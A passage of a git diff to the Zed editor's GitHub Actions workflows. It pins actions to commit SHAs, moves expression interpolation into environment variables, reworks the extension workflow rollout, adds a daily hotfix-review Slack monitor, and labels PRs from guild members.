cargo fmt --all -- --check + - id: get-package-name + name: extension_tests::get_package_name + run: | + PACKAGE_NAME="$(sed -n 's/^name = "\(.*\)"/\1/p' < Cargo.toml | head -1 | tr -d '[:space:]')" + echo "package_name=${PACKAGE_NAME}" >> "$GITHUB_OUTPUT" + - name: extension_tests::cargo_fmt_package + run: cargo fmt -p "$PACKAGE_NAME" -- --check + env: + PACKAGE_NAME: ${{ steps.get-package-name.outputs.package_name }} - name: extension_tests::run_clippy - run: cargo clippy --release --all-features -- --deny warnings + run: cargo clippy -p "$PACKAGE_NAME" --release --all-features -- --deny warnings + env: + PACKAGE_NAME: ${{ steps.get-package-name.outputs.package_name }} - name: steps::cargo_install_nextest - uses: taiki-e/install-action@nextest - - name: steps::cargo_nextest - run: 'cargo nextest run --workspace --no-fail-fast --no-tests=warn --target "$(rustc -vV | sed -n ''s|host: ||p'')"' + uses: taiki-e/install-action@921e2c9f7148d7ba14cd819f417db338f63e733c + - name: extension_tests::run_nextest + run: 'cargo nextest run -p "$PACKAGE_NAME" --no-fail-fast --no-tests=warn --target "$(rustc -vV | sed -n ''s|host: ||p'')"' env: + PACKAGE_NAME: ${{ steps.get-package-name.outputs.package_name }} NEXTEST_NO_TESTS: warn timeout-minutes: 6 + defaults: + run: + shell: bash -euxo pipefail {0} + working-directory: ${{ inputs.working-directory }} check_extension: needs: - orchestrate @@ -84,7 +115,7 @@ jobs: runs-on: namespace-profile-8x32-ubuntu-2404 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false fetch-depth: 0 @@ -97,10 +128,10 @@ jobs: - name: extension_tests::download_zed_extension_cli if: steps.cache-zed-extension-cli.outputs.cache-hit != 'true' run: | - wget --quiet "https://zed-extension-cli.nyc3.digitaloceanspaces.com/$ZED_EXTENSION_CLI_SHA/x86_64-unknown-linux-gnu/zed-extension" - chmod +x zed-extension + wget --quiet 
"https://zed-extension-cli.nyc3.digitaloceanspaces.com/$ZED_EXTENSION_CLI_SHA/x86_64-unknown-linux-gnu/zed-extension" -O "$GITHUB_WORKSPACE/zed-extension" + chmod +x "$GITHUB_WORKSPACE/zed-extension" - name: steps::cache_rust_dependencies_namespace - uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: cache: rust path: ~/.rustup @@ -108,17 +139,30 @@ jobs: run: | mkdir -p /tmp/ext-scratch mkdir -p /tmp/ext-output - ./zed-extension --source-dir . --scratch-dir /tmp/ext-scratch --output-dir /tmp/ext-output + "$GITHUB_WORKSPACE/zed-extension" --source-dir . --scratch-dir /tmp/ext-scratch --output-dir /tmp/ext-output + - name: run_tests::fetch_ts_query_ls + uses: dsaltares/fetch-gh-release-asset@aa37ae5c44d3c9820bc12fe675e8670ecd93bd1c + with: + repo: ribru17/ts_query_ls + version: tags/v3.15.1 + file: ts_query_ls-x86_64-unknown-linux-gnu.tar.gz + - name: run_tests::run_ts_query_ls + run: |- + tar -xf "$GITHUB_WORKSPACE/ts_query_ls-x86_64-unknown-linux-gnu.tar.gz" -C "$GITHUB_WORKSPACE" + "$GITHUB_WORKSPACE/ts_query_ls" format --check . || { + echo "Found unformatted queries, please format them with ts_query_ls." 
+ echo "For easy use, install the Tree-sitter query extension:" + echo "zed://extension/tree-sitter-query" + false + } - id: compare-versions-check name: extension_bump::compare_versions run: | CURRENT_VERSION="$(sed -n 's/^version = \"\(.*\)\"/\1/p' < extension.toml | tr -d '[:space:]')" - if [[ "${{ github.event_name }}" == "pull_request" ]]; then + if [[ "$GITHUB_EVENT_NAME" == "pull_request" ]]; then PR_FORK_POINT="$(git merge-base origin/main HEAD)" git checkout "$PR_FORK_POINT" - elif BRANCH_PARENT_SHA="$(git merge-base origin/main origin/zed-zippy-autobump)"; then - git checkout "$BRANCH_PARENT_SHA" else git checkout "$(git log -1 --format=%H)"~1 fi @@ -132,12 +176,19 @@ jobs: echo "current_version=${CURRENT_VERSION}" >> "$GITHUB_OUTPUT" - name: extension_tests::verify_version_did_not_change run: | - if [[ ${{ steps.compare-versions-check.outputs.version_changed }} == "true" && "${{ github.event_name }}" == "pull_request" && "${{ github.event.pull_request.user.login }}" != "zed-zippy[bot]" ]] ; then + if [[ "$VERSION_CHANGED" == "true" && "$GITHUB_EVENT_NAME" == "pull_request" && "$PR_USER_LOGIN" != "zed-zippy[bot]" ]] ; then echo "Version change detected in your change!" 
echo "Version changes happen in separate PRs and will be performed by the zed-zippy bot" exit 42 fi + env: + VERSION_CHANGED: ${{ steps.compare-versions-check.outputs.version_changed }} + PR_USER_LOGIN: ${{ github.event.pull_request.user.login }} timeout-minutes: 6 + defaults: + run: + shell: bash -euxo pipefail {0} + working-directory: ${{ inputs.working-directory }} tests_pass: needs: - orchestrate @@ -156,13 +207,17 @@ jobs: if [[ "$2" != "skipped" && "$2" != "success" ]]; then EXIT_CODE=1; fi } - check_result "orchestrate" "${{ needs.orchestrate.result }}" - check_result "check_rust" "${{ needs.check_rust.result }}" - check_result "check_extension" "${{ needs.check_extension.result }}" + check_result "orchestrate" "$RESULT_ORCHESTRATE" + check_result "check_rust" "$RESULT_CHECK_RUST" + check_result "check_extension" "$RESULT_CHECK_EXTENSION" exit $EXIT_CODE + env: + RESULT_ORCHESTRATE: ${{ needs.orchestrate.result }} + RESULT_CHECK_RUST: ${{ needs.check_rust.result }} + RESULT_CHECK_EXTENSION: ${{ needs.check_extension.result }} concurrency: - group: ${{ github.workflow }}-${{ github.ref_name }}-${{ github.ref_name == 'main' && github.sha || 'anysha' }} + group: ${{ github.workflow }}-${{ github.ref_name }}-${{ github.ref_name == 'main' && github.sha || 'anysha' }}extension-tests cancel-in-progress: true defaults: run: diff --git a/.github/workflows/extension_workflow_rollout.yml b/.github/workflows/extension_workflow_rollout.yml index 709956fc1bc0b25190638d9f1b5d4cd3cadd7ba2..5bb315a730d8f25f6e1eccbbe5e1734e1cda6d99 100644 --- a/.github/workflows/extension_workflow_rollout.yml +++ b/.github/workflows/extension_workflow_rollout.yml @@ -4,15 +4,60 @@ name: extension_workflow_rollout env: CARGO_TERM_COLOR: always on: - workflow_dispatch: {} + workflow_dispatch: + inputs: + filter-repos: + description: Comma-separated list of repository names to rollout to. Leave empty for all repos. 
+ type: string + default: '' + change-description: + description: Description for the changes to be expected with this rollout + type: string + default: '' jobs: fetch_extension_repos: if: (github.repository_owner == 'zed-industries' || github.repository_owner == 'zed-extensions') && github.ref == 'refs/heads/main' runs-on: namespace-profile-2x4-ubuntu-2404 steps: + - name: checkout_zed_repo + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd + with: + clean: false + fetch-depth: 0 + - id: prev-tag + name: extension_workflow_rollout::fetch_extension_repos::get_previous_tag_commit + run: | + PREV_COMMIT=$(git rev-parse "extension-workflows^{commit}" 2>/dev/null || echo "") + if [ -z "$PREV_COMMIT" ]; then + echo "::error::No previous rollout tag 'extension-workflows' found. Cannot determine file changes." + exit 1 + fi + echo "Found previous rollout at commit: $PREV_COMMIT" + echo "prev_commit=$PREV_COMMIT" >> "$GITHUB_OUTPUT" + - id: calc-changes + name: extension_workflow_rollout::fetch_extension_repos::get_removed_files + run: | + for workflow_type in "ci" "shared"; do + if [ "$workflow_type" = "ci" ]; then + WORKFLOW_DIR="extensions/workflows" + else + WORKFLOW_DIR="extensions/workflows/shared" + fi + + REMOVED=$(git diff --name-status -M "$PREV_COMMIT" HEAD -- "$WORKFLOW_DIR" | \ + awk '/^D/ { print $2 } /^R/ { print $2 }' | \ + xargs -I{} basename {} 2>/dev/null | \ + tr '\n' ' ' || echo "") + REMOVED=$(echo "$REMOVED" | xargs) + + echo "Removed files for $workflow_type: $REMOVED" + echo "removed_${workflow_type}=$REMOVED" >> "$GITHUB_OUTPUT" + done + env: + PREV_COMMIT: ${{ steps.prev-tag.outputs.prev_commit }} - id: list-repos name: extension_workflow_rollout::fetch_extension_repos::get_repositories - uses: actions/github-script@v7 + uses: actions/github-script@f28e40c7f34bde8b3046d885e986cb6290c5673b with: script: | const repos = await github.paginate(github.rest.repos.listForOrg, { @@ -21,16 +66,42 @@ jobs: per_page: 100, }); - const 
filteredRepos = repos + let filteredRepos = repos .filter(repo => !repo.archived) .map(repo => repo.name); + const filterInput = `${{ inputs.filter-repos }}`.trim(); + if (filterInput.length > 0) { + const allowedNames = filterInput.split(',').map(s => s.trim()).filter(s => s.length > 0); + filteredRepos = filteredRepos.filter(name => allowedNames.includes(name)); + console.log(`Filter applied. Matched ${filteredRepos.length} repos from ${allowedNames.length} requested.`); + } + console.log(`Found ${filteredRepos.length} extension repos`); return filteredRepos; result-encoding: json + - name: steps::cache_rust_dependencies_namespace + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 + with: + cache: rust + path: ~/.rustup + - name: extension_workflow_rollout::fetch_extension_repos::generate_workflow_files + run: | + cargo xtask workflows "$COMMIT_SHA" + env: + COMMIT_SHA: ${{ github.sha }} + - name: extension_workflow_rollout::fetch_extension_repos::upload_workflow_files + uses: actions/upload-artifact@330a01c490aca151604b8cf639adc76d48f6c5d4 + with: + name: extension-workflow-files + path: extensions/workflows/**/*.yml + if-no-files-found: error outputs: repos: ${{ steps.list-repos.outputs.result }} - timeout-minutes: 5 + prev_commit: ${{ steps.prev-tag.outputs.prev_commit }} + removed_ci: ${{ steps.calc-changes.outputs.removed_ci }} + removed_shared: ${{ steps.calc-changes.outputs.removed_shared }} + timeout-minutes: 10 rollout_workflows_to_extension: needs: - fetch_extension_repos @@ -43,8 +114,8 @@ jobs: max-parallel: 10 steps: - id: generate-token - name: extension_bump::generate_token - uses: actions/create-github-app-token@v2 + name: steps::generate_token + uses: actions/create-github-app-token@f8d387b68d61c58ab83c6c016672934102569859 with: app-id: ${{ secrets.ZED_ZIPPY_APP_ID }} private-key: ${{ secrets.ZED_ZIPPY_APP_PRIVATE_KEY }} @@ -53,60 +124,28 @@ jobs: permission-pull-requests: write permission-contents: write 
permission-workflows: write - - name: checkout_zed_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 - with: - clean: false - fetch-depth: 0 - path: zed - name: checkout_extension_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - token: ${{ steps.generate-token.outputs.token }} path: extension repository: zed-extensions/${{ matrix.repo }} - - id: prev-tag - name: extension_workflow_rollout::rollout_workflows_to_extension::get_previous_tag_commit - run: | - PREV_COMMIT=$(git rev-parse "extension-workflows^{commit}" 2>/dev/null || echo "") - if [ -z "$PREV_COMMIT" ]; then - echo "::error::No previous rollout tag 'extension-workflows' found. Cannot determine file changes." - exit 1 - fi - echo "Found previous rollout at commit: $PREV_COMMIT" - echo "prev_commit=$PREV_COMMIT" >> "$GITHUB_OUTPUT" - working-directory: zed - - id: calc-changes - name: extension_workflow_rollout::rollout_workflows_to_extension::get_removed_files + token: ${{ steps.generate-token.outputs.token }} + - name: extension_workflow_rollout::rollout_workflows_to_extension::download_workflow_files + uses: actions/download-artifact@018cc2cf5baa6db3ef3c5f8a56943fffe632ef53 + with: + name: extension-workflow-files + path: workflow-files + - name: extension_workflow_rollout::rollout_workflows_to_extension::sync_workflow_files run: | - PREV_COMMIT="${{ steps.prev-tag.outputs.prev_commit }}" + mkdir -p extension/.github/workflows - if [ "${{ matrix.repo }}" = "workflows" ]; then - WORKFLOW_DIR="extensions/workflows" + if [ "$MATRIX_REPO" = "workflows" ]; then + REMOVED_FILES="$REMOVED_CI" else - WORKFLOW_DIR="extensions/workflows/shared" + REMOVED_FILES="$REMOVED_SHARED" fi - echo "Calculating changes from $PREV_COMMIT to HEAD for $WORKFLOW_DIR" - - # Get deleted files (status D) and renamed files (status R - old name needs removal) - # Using -M to detect renames, then 
extracting files that are gone from their original location - REMOVED_FILES=$(git diff --name-status -M "$PREV_COMMIT" HEAD -- "$WORKFLOW_DIR" | \ - awk '/^D/ { print $2 } /^R/ { print $2 }' | \ - xargs -I{} basename {} 2>/dev/null | \ - tr '\n' ' ' || echo "") - - REMOVED_FILES=$(echo "$REMOVED_FILES" | xargs) - - echo "Files to remove: $REMOVED_FILES" - echo "removed_files=$REMOVED_FILES" >> "$GITHUB_OUTPUT" - working-directory: zed - - name: extension_workflow_rollout::rollout_workflows_to_extension::sync_workflow_files - run: | - REMOVED_FILES="${{ steps.calc-changes.outputs.removed_files }}" - - mkdir -p extension/.github/workflows cd extension/.github/workflows if [ -n "$REMOVED_FILES" ]; then @@ -119,25 +158,30 @@ jobs: cd - > /dev/null - if [ "${{ matrix.repo }}" = "workflows" ]; then - cp zed/extensions/workflows/*.yml extension/.github/workflows/ + if [ "$MATRIX_REPO" = "workflows" ]; then + cp workflow-files/*.yml extension/.github/workflows/ else - cp zed/extensions/workflows/shared/*.yml extension/.github/workflows/ + cp workflow-files/shared/*.yml extension/.github/workflows/ fi + env: + REMOVED_CI: ${{ needs.fetch_extension_repos.outputs.removed_ci }} + REMOVED_SHARED: ${{ needs.fetch_extension_repos.outputs.removed_shared }} + MATRIX_REPO: ${{ matrix.repo }} - id: short-sha name: extension_workflow_rollout::rollout_workflows_to_extension::get_short_sha run: | - echo "sha_short=$(git rev-parse --short=7 HEAD)" >> "$GITHUB_OUTPUT" - working-directory: zed + echo "sha_short=$(echo "$GITHUB_SHA" | cut -c1-7)" >> "$GITHUB_OUTPUT" - id: create-pr name: extension_workflow_rollout::rollout_workflows_to_extension::create_pull_request - uses: peter-evans/create-pull-request@v7 + uses: peter-evans/create-pull-request@98357b18bf14b5342f975ff684046ec3b2a07725 with: path: extension title: Update CI workflows to `${{ steps.short-sha.outputs.sha_short }}` body: | This PR updates the CI workflow files from the main Zed repository based on the commit 
zed-industries/zed@${{ github.sha }} + + ${{ inputs.change-description }} commit-message: Update CI workflows to `${{ steps.short-sha.outputs.sha_short }}` branch: update-workflows committer: zed-zippy[bot] <234243425+zed-zippy[bot]@users.noreply.github.com> @@ -148,28 +192,29 @@ jobs: sign-commits: true - name: extension_workflow_rollout::rollout_workflows_to_extension::enable_auto_merge run: | - PR_NUMBER="${{ steps.create-pr.outputs.pull-request-number }}" if [ -n "$PR_NUMBER" ]; then - cd extension gh pr merge "$PR_NUMBER" --auto --squash fi env: GH_TOKEN: ${{ steps.generate-token.outputs.token }} + PR_NUMBER: ${{ steps.create-pr.outputs.pull-request-number }} + working-directory: extension timeout-minutes: 10 create_rollout_tag: needs: - rollout_workflows_to_extension + if: inputs.filter-repos == '' runs-on: namespace-profile-2x4-ubuntu-2404 steps: - id: generate-token - name: extension_bump::generate_token - uses: actions/create-github-app-token@v2 + name: steps::generate_token + uses: actions/create-github-app-token@f8d387b68d61c58ab83c6c016672934102569859 with: app-id: ${{ secrets.ZED_ZIPPY_APP_ID }} private-key: ${{ secrets.ZED_ZIPPY_APP_PRIVATE_KEY }} permission-contents: write - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false fetch-depth: 0 diff --git a/.github/workflows/good_first_issue_notifier.yml b/.github/workflows/good_first_issue_notifier.yml index f366c671726348f605325576d65e13c6faa5616e..fc1b49424dce248d107d35cd6f228dd297478cad 100644 --- a/.github/workflows/good_first_issue_notifier.yml +++ b/.github/workflows/good_first_issue_notifier.yml @@ -11,7 +11,7 @@ jobs: steps: - name: Checkout repository - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd # v5.0.1 - name: Prepare Discord message id: prepare-message diff --git 
a/.github/workflows/hotfix-review-monitor.yml b/.github/workflows/hotfix-review-monitor.yml new file mode 100644 index 0000000000000000000000000000000000000000..760cd9806c9928d784de1b69ed97c86148ae6fc1 --- /dev/null +++ b/.github/workflows/hotfix-review-monitor.yml @@ -0,0 +1,114 @@ +# Hotfix Review Monitor +# +# Runs daily and checks for merged PRs with the 'hotfix' label that have not +# received a post-merge review approval within one business day. Posts a summary to +# Slack if any are found. This is a SOC2 compensating control for the +# emergency hotfix fast path. +# +# Security note: No untrusted input (PR titles, bodies, etc.) is interpolated +# into shell commands. All PR metadata is read via gh API + jq, not via +# github.event context expressions. +# +# Required secrets: +# SLACK_WEBHOOK_PR_REVIEW_BOT - Incoming webhook URL for the #pr-review-ops channel + +name: Hotfix Review Monitor + +on: + schedule: + - cron: "30 13 * * 1-5" # 1:30 PM UTC weekdays + workflow_dispatch: {} + +permissions: + contents: read + pull-requests: read + +jobs: + check-hotfix-reviews: + if: github.repository_owner == 'zed-industries' + runs-on: ubuntu-latest + timeout-minutes: 5 + env: + REPO: ${{ github.repository }} + steps: + - name: Find unreviewed hotfixes + id: check + env: + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + # 80h lookback covers the Friday-to-Monday gap (72h) with buffer. + # Overlap on weekdays is harmless — reviewed PRs are filtered out below. + SINCE=$(date -u -v-80H +%Y-%m-%dT%H:%M:%SZ 2>/dev/null \ + || date -u -d '80 hours ago' +%Y-%m-%dT%H:%M:%SZ) + SINCE_DATE=$(echo "$SINCE" | cut -dT -f1) + + # Use the Search API to find hotfix PRs merged in the lookback window. + # The Pulls API with state=closed paginates through all closed PRs in + # the repo, which times out on large repos. The Search API supports + # merged:>DATE natively so GitHub does the filtering server-side. 
+ gh api --paginate \ + "search/issues?q=repo:${REPO}+is:pr+is:merged+label:hotfix+merged:>${SINCE_DATE}&per_page=100" \ + --jq '[.items[] | {number, title, merged_at: .pull_request.merged_at}]' \ + > /tmp/hotfix_prs.json + + # Check each hotfix PR for a post-merge approving review + jq -r '.[].number' /tmp/hotfix_prs.json | while read -r PR_NUMBER; do + APPROVALS=$(gh api \ + "repos/${REPO}/pulls/${PR_NUMBER}/reviews" \ + --jq "[.[] | select(.state == \"APPROVED\")] | length") + + if [ "$APPROVALS" -eq 0 ]; then + jq ".[] | select(.number == ${PR_NUMBER})" /tmp/hotfix_prs.json + fi + done | jq -s '.' > /tmp/unreviewed.json + + COUNT=$(jq 'length' /tmp/unreviewed.json) + echo "count=$COUNT" >> "$GITHUB_OUTPUT" + + - name: Notify Slack + if: steps.check.outputs.count != '0' + env: + SLACK_WEBHOOK_PR_REVIEW_BOT: ${{ secrets.SLACK_WEBHOOK_PR_REVIEW_BOT }} + COUNT: ${{ steps.check.outputs.count }} + run: | + # Build Block Kit payload from JSON — no shell interpolation of PR titles. + # Why jq? PR titles are attacker-controllable input. By reading them + # through jq -r from the JSON file and passing the result to jq --arg, + # the content stays safely JSON-encoded in the final payload. Block Kit + # doesn't change this — the same jq pipeline feeds into the blocks + # structure instead of plain text. + PRS=$(jq -r '.[] | "• #\(.number) — \(.title) (merged \(.merged_at | split("T")[0]))"' /tmp/unreviewed.json) + + jq -n \ + --arg count "$COUNT" \ + --arg prs "$PRS" \ + '{ + text: ($count + " hotfix PR(s) still need post-merge review"), + blocks: [ + { + type: "section", + text: { + type: "mrkdwn", + text: (":rotating_light: *" + $count + " Hotfix PR(s) Need Post-Merge Review*") + } + }, + { + type: "section", + text: { type: "mrkdwn", text: $prs } + }, + { type: "divider" }, + { + type: "context", + elements: [{ + type: "mrkdwn", + text: "Hotfix PRs require review within one business day of merge." 
+ }] + } + ] + }' | \ + curl -s -X POST "$SLACK_WEBHOOK_PR_REVIEW_BOT" \ + -H 'Content-Type: application/json' \ + -d @- +defaults: + run: + shell: bash -euxo pipefail {0} diff --git a/.github/workflows/pr_labeler.yml b/.github/workflows/pr_labeler.yml index cc9c4a9eefd4aa75ba69fb18b353efa6a32778c5..2f09ad681698d008845565c989b26f51c489d500 100644 --- a/.github/workflows/pr_labeler.yml +++ b/.github/workflows/pr_labeler.yml @@ -1,5 +1,6 @@ # Labels pull requests by author: 'bot' for bot accounts, 'staff' for -# staff team members, 'first contribution' for first-time external contributors. +# staff team members, 'guild' for guild members, 'first contribution' for +# first-time external contributors. name: PR Labeler on: @@ -16,7 +17,7 @@ jobs: timeout-minutes: 5 steps: - id: get-app-token - uses: actions/create-github-app-token@bef1eaf1c0ac2b148ee2a0a74c65fbe6db0631f1 # v2.1.4 + uses: actions/create-github-app-token@f8d387b68d61c58ab83c6c016672934102569859 # v3.0.0 with: app-id: ${{ secrets.ZED_COMMUNITY_BOT_APP_ID }} private-key: ${{ secrets.ZED_COMMUNITY_BOT_PRIVATE_KEY }} @@ -29,8 +30,50 @@ jobs: script: | const BOT_LABEL = 'bot'; const STAFF_LABEL = 'staff'; + const GUILD_LABEL = 'guild'; const FIRST_CONTRIBUTION_LABEL = 'first contribution'; const STAFF_TEAM_SLUG = 'staff'; + const GUILD_MEMBERS = [ + '11happy', + 'AidanV', + 'AmaanBilwar', + 'OmChillure', + 'Palanikannan1437', + 'Shivansh-25', + 'SkandaBhat', + 'TwistingTwists', + 'YEDASAVG', + 'Ziqi-Yang', + 'alanpjohn', + 'arjunkomath', + 'austincummings', + 'ayushk-1801', + 'claiwe', + 'criticic', + 'dongdong867', + 'emamulandalib', + 'eureka928', + 'feitreim', + 'iam-liam', + 'iksuddle', + 'ishaksebsib', + 'lingyaochu', + 'loadingalias', + 'marcocondrache', + 'mchisolm0', + 'mostlyKIGuess', + 'nairadithya', + 'nihalxkumar', + 'notJoon', + 'polyesterswing', + 'prayanshchh', + 'razeghi71', + 'sarmadgulzar', + 'seanstrom', + 'th0jensen', + 'tommyming', + 'virajbhartiya', + ]; const pr = 
context.payload.pull_request; const author = pr.user.login; @@ -71,6 +114,17 @@ jobs: return; } + if (GUILD_MEMBERS.includes(author)) { + await github.rest.issues.addLabels({ + owner: context.repo.owner, + repo: context.repo.repo, + issue_number: pr.number, + labels: [GUILD_LABEL] + }); + console.log(`PR #${pr.number} by ${author}: labeled '${GUILD_LABEL}' (guild member)`); + // No early return: guild members can also get 'first contribution' + } + // We use inverted logic here due to a suspected GitHub bug where first-time contributors // get 'NONE' instead of 'FIRST_TIME_CONTRIBUTOR' or 'FIRST_TIMER'. // https://github.com/orgs/community/discussions/78038 diff --git a/.github/workflows/publish_extension_cli.yml b/.github/workflows/publish_extension_cli.yml index 391baac1cb3aa9da76c4fde39aa6909525541a58..17248cea11307d4604b05d5160212a4f38e2874a 100644 --- a/.github/workflows/publish_extension_cli.yml +++ b/.github/workflows/publish_extension_cli.yml @@ -11,14 +11,14 @@ on: jobs: publish_job: if: (github.repository_owner == 'zed-industries' || github.repository_owner == 'zed-extensions') - runs-on: namespace-profile-2x4-ubuntu-2404 + runs-on: namespace-profile-16x32-ubuntu-2204 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::cache_rust_dependencies_namespace - uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: cache: rust path: ~/.rustup @@ -27,7 +27,7 @@ jobs: - name: publish_extension_cli::publish_job::build_extension_cli run: cargo build --release --package extension_cli - name: publish_extension_cli::publish_job::upload_binary - run: script/upload-extension-cli ${{ github.sha }} + run: script/upload-extension-cli "$GITHUB_SHA" env: DIGITALOCEAN_SPACES_ACCESS_KEY: ${{ secrets.DIGITALOCEAN_SPACES_ACCESS_KEY }} 
DIGITALOCEAN_SPACES_SECRET_KEY: ${{ secrets.DIGITALOCEAN_SPACES_SECRET_KEY }} @@ -38,32 +38,32 @@ jobs: runs-on: namespace-profile-8x16-ubuntu-2204 steps: - id: generate-token - name: extension_bump::generate_token - uses: actions/create-github-app-token@v2 + name: steps::generate_token + uses: actions/create-github-app-token@f8d387b68d61c58ab83c6c016672934102569859 with: app-id: ${{ secrets.ZED_ZIPPY_APP_ID }} private-key: ${{ secrets.ZED_ZIPPY_APP_PRIVATE_KEY }} - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::cache_rust_dependencies_namespace - uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: cache: rust path: ~/.rustup - id: short-sha name: publish_extension_cli::get_short_sha run: | - echo "sha_short=$(echo "${{ github.sha }}" | cut -c1-7)" >> "$GITHUB_OUTPUT" + echo "sha_short=$(echo "$GITHUB_SHA" | cut -c1-7)" >> "$GITHUB_OUTPUT" - name: publish_extension_cli::update_sha_in_zed::replace_sha run: | - sed -i "s/ZED_EXTENSION_CLI_SHA: &str = \"[a-f0-9]*\"/ZED_EXTENSION_CLI_SHA: \&str = \"${{ github.sha }}\"/" \ + sed -i "s/ZED_EXTENSION_CLI_SHA: &str = \"[a-f0-9]*\"/ZED_EXTENSION_CLI_SHA: \&str = \"$GITHUB_SHA\"/" \ tooling/xtask/src/tasks/workflows/extension_tests.rs - name: publish_extension_cli::update_sha_in_zed::regenerate_workflows run: cargo xtask workflows - name: publish_extension_cli::create_pull_request_zed - uses: peter-evans/create-pull-request@v7 + uses: peter-evans/create-pull-request@98357b18bf14b5342f975ff684046ec3b2a07725 with: title: 'extension_ci: Bump extension CLI version to `${{ steps.short-sha.outputs.sha_short }}`' body: | @@ -87,8 +87,8 @@ jobs: runs-on: namespace-profile-2x4-ubuntu-2404 steps: - id: generate-token - name: extension_bump::generate_token - uses: actions/create-github-app-token@v2 + name: 
steps::generate_token + uses: actions/create-github-app-token@f8d387b68d61c58ab83c6c016672934102569859 with: app-id: ${{ secrets.ZED_ZIPPY_APP_ID }} private-key: ${{ secrets.ZED_ZIPPY_APP_PRIVATE_KEY }} @@ -97,7 +97,7 @@ jobs: - id: short-sha name: publish_extension_cli::get_short_sha run: | - echo "sha_short=$(echo "${{ github.sha }}" | cut -c1-7)" >> "$GITHUB_OUTPUT" + echo "sha_short=$(echo "$GITHUB_SHA" | cut -c1-7)" >> "$GITHUB_OUTPUT" - name: publish_extension_cli::update_sha_in_extensions::checkout_extensions_repo uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 with: @@ -105,10 +105,10 @@ jobs: token: ${{ steps.generate-token.outputs.token }} - name: publish_extension_cli::update_sha_in_extensions::replace_sha run: | - sed -i "s/ZED_EXTENSION_CLI_SHA: [a-f0-9]*/ZED_EXTENSION_CLI_SHA: ${{ github.sha }}/" \ + sed -i "s/ZED_EXTENSION_CLI_SHA: [a-f0-9]*/ZED_EXTENSION_CLI_SHA: $GITHUB_SHA/" \ .github/workflows/ci.yml - name: publish_extension_cli::create_pull_request_extensions - uses: peter-evans/create-pull-request@v7 + uses: peter-evans/create-pull-request@98357b18bf14b5342f975ff684046ec3b2a07725 with: title: Bump extension CLI version to `${{ steps.short-sha.outputs.sha_short }}` body: | diff --git a/.github/workflows/randomized_tests.yml b/.github/workflows/randomized_tests.yml index de96c3df78bdb67edd584696f02316478e4446dd..9655a81235d79e1e24ae5185ebce8c8051437392 100644 --- a/.github/workflows/randomized_tests.yml +++ b/.github/workflows/randomized_tests.yml @@ -28,7 +28,7 @@ jobs: node-version: "18" - name: Checkout repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd # v5.0.1 with: clean: false diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml index 4442b068a88800e8437d5c6e459acec954308946..1401144ab3abda17dd4f526edd42166d37a47a49 100644 --- a/.github/workflows/release.yml +++ b/.github/workflows/release.yml @@ -14,7 +14,7 @@ 
jobs: runs-on: namespace-profile-mac-large steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_cargo_config @@ -22,7 +22,7 @@ jobs: mkdir -p ./../.cargo cp ./.cargo/ci-config.toml ./../.cargo/config.toml - name: steps::cache_rust_dependencies_namespace - uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: cache: rust path: ~/.rustup @@ -31,7 +31,7 @@ jobs: with: node-version: '20' - name: steps::cargo_install_nextest - uses: taiki-e/install-action@nextest + uses: taiki-e/install-action@921e2c9f7148d7ba14cd819f417db338f63e733c - name: steps::clear_target_dir_if_large run: ./script/clear-target-dir-if-larger-than 300 - name: steps::setup_sccache @@ -43,6 +43,8 @@ jobs: SCCACHE_BUCKET: sccache-zed - name: steps::cargo_nextest run: cargo nextest run --workspace --no-fail-fast --no-tests=warn + - name: steps::cargo_build_visual_tests + run: cargo build -p zed --bin zed_visual_test_runner --features visual-tests - name: steps::show_sccache_stats run: sccache --show-stats || true - name: steps::cleanup_cargo_config @@ -53,9 +55,12 @@ jobs: run_tests_linux: if: (github.repository_owner == 'zed-industries' || github.repository_owner == 'zed-extensions') runs-on: namespace-profile-16x32-ubuntu-2204 + env: + CC: clang + CXX: clang++ steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_cargo_config @@ -63,14 +68,12 @@ jobs: mkdir -p ./../.cargo cp ./.cargo/ci-config.toml ./../.cargo/config.toml - name: steps::cache_rust_dependencies_namespace - uses: 